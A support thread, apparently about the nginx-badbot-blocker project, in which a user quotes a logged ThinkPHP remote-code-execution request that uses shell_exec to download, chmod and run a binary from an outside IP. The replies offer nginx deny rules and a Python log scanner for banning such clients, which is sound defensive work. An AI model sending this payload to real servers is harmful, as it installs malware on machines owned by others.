nginx-badbot-blocker
scripts crawling my servers
Hi,
was wondering if you have experience with such requests:
/index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://185.244.25.221/bins/Yowai.x86 -O /tmp/Yowai; chmod 777 /tmp/Yowai; /tmp/Yowai Yowai.x86'
- is it possible to "auto-ban" such IPs?
You can reject this attack by nginx rules:
    location / {
        if ($http_user_agent ~ (tsunami) ) {
            return 403;
        }
        if ($query_string ~ "call_user_func_array" ) {
            return 403;
        }
        ...
    }
Link https://serverfault.com/questions/957075/block-remote-code-execution-ubuntu-server-fail2ban-cloudflare
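For the "auto-ban" part of the question, the sketch below is an added example (not code from this thread or from the nginx-badbot-blocker project) that scans nginx access-log lines for the same two markers the rules above reject and returns the client IPs to ban. It assumes the default "combined" log format; the log lines, IP addresses and function names are constructed for illustration.

```python
import re
from collections import Counter
from urllib.parse import unquote_plus

# nginx "combined" format: ip - user [time] "request" status bytes "referer" "ua"
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<request>[^"]*)" \d{3} \S+'
    r' "[^"]*" "(?P<ua>[^"]*)"'
)
# The same two markers the nginx rules match, here matched case-insensitively.
BAD_QUERY = re.compile(r"call_user_func_array", re.IGNORECASE)
BAD_UA = re.compile(r"tsunami", re.IGNORECASE)

# Constructed sample lines (documentation IP ranges, placeholder payload).
SAMPLE_LOG = [
    r'203.0.113.7 - - [10/Mar/2019:06:25:14 +0000] "GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=PLACEHOLDER HTTP/1.1" 403 162 "-" "Mozilla/5.0"',
    r'198.51.100.23 - - [10/Mar/2019:06:25:20 +0000] "GET / HTTP/1.1" 403 162 "-" "tsunami"',
    r'192.0.2.10 - - [10/Mar/2019:06:26:02 +0000] "GET /index.php?page=2 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
]

def offending_ip(line):
    """Return the client IP if the line matches a marker, else None."""
    m = LINE_RE.match(line)
    if not m:
        return None  # not a combined-format line; ignore it
    # Drop the method and the trailing protocol version to get the target.
    _, _, rest = m.group("request").partition(" ")
    target = rest.rsplit(" HTTP/", 1)[0]
    # Normalise percent-encoding in the query string before matching.
    query = unquote_plus(target.partition("?")[2])
    if BAD_QUERY.search(query) or BAD_UA.search(m.group("ua")):
        return m.group("ip")
    return None

def ips_to_ban(lines, threshold=1):
    """IPs with at least `threshold` matching requests, sorted."""
    hits = Counter(ip for ip in map(offending_ip, lines) if ip)
    return sorted(ip for ip, n in hits.items() if n >= threshold)

if __name__ == "__main__":
    for ip in ips_to_ban(SAMPLE_LOG):
        print(ip)
```

The returned list can be handed to whatever does the blocking on the host, such as a firewall set or a fail2ban jail as discussed in the linked question.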